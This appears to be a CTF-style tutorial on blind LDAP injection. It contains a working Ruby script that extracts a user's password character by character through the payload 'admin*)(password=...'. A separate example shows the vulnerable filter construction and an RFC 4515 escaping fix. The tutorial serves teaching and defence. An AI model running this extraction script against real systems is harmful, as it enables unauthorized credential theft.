LDAP injection
This is a very basic script that retrieves a user's password in a blind LDAP injection case by brute-forcing it one character at a time. The `search` parameter is concatenated unescaped into the server's LDAP filter, so the payload `admin*)(password=...` closes the intended assertion and appends a new one; each guess succeeds only when the response contains the "true" marker.
```ruby
#!/usr/bin/env ruby
require 'net/http'

# Candidate characters for each position of the password.
alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '#@{}-/()!"$%=^[]:;'.split('')

flag = ''

(0..50).each do |i|
  puts("[i] Looking for number #{i}")
  alphabet.each do |char|
    # Build the injected search value and URL-encode it, otherwise characters such as
    # " # [ ] in the alphabet are rejected by URI() or are parsed as a fragment.
    search = URI.encode_www_form_component("admin*)(password=#{flag}#{char}")
    r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=#{search}"))

    # Replace TRUE CONDITION with the text that appears only when the filter matched.
    if /TRUE CONDITION/.match?(r)
      flag += char
      puts("[+] Flag: #{flag}")
      break
    end
  end
end
```
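The following is an added example, not code from the original page: it shows why the `admin*)(password=x` payload works against a filter built by string concatenation, and how escaping the value per RFC 4515 reduces it to a harmless literal. The filter template `(&(uid=...)(objectClass=person))` is an assumption about the vulnerable application; nothing here talks to an LDAP server.

```ruby
# RFC 4515 escapes for the characters that carry meaning inside a filter value.
LDAP_ESCAPES = {
  '\\' => '\5c',
  '*'  => '\2a',
  '('  => '\28',
  ')'  => '\29',
  "\0" => '\00'
}.freeze

# Escape every special character so user input can only ever be a literal value.
def escape_ldap_value(value)
  value.gsub(/[\\*()\0]/) { |c| LDAP_ESCAPES[c] }
end

# The pattern behind the script above: raw input concatenated into the filter
# (assumed template, see lead-in).
def vulnerable_filter(search)
  "(&(uid=#{search})(objectClass=person))"
end

# The fix: same template, but the value is escaped before concatenation.
def hardened_filter(search)
  "(&(uid=#{escape_ldap_value(search)})(objectClass=person))"
end

# Number of assertions the server will evaluate: every raw "(" after the outer
# "(&" opens one. Escaped values contain "\28" instead of "(", so they add none.
def assertion_count(filter)
  filter.count('(') - 1
end

if __FILE__ == $PROGRAM_NAME
  payload = 'admin*)(password=x'   # constructed sample, mirrors the page's payload
  [vulnerable_filter(payload), hardened_filter(payload)].each do |f|
    puts "#{assertion_count(f)} assertion(s): #{f}"
  end
end
```

Real LDAP libraries ship an equivalent escape routine; the point is that the escaping has to happen on the value, which parameterised filter builders do for you.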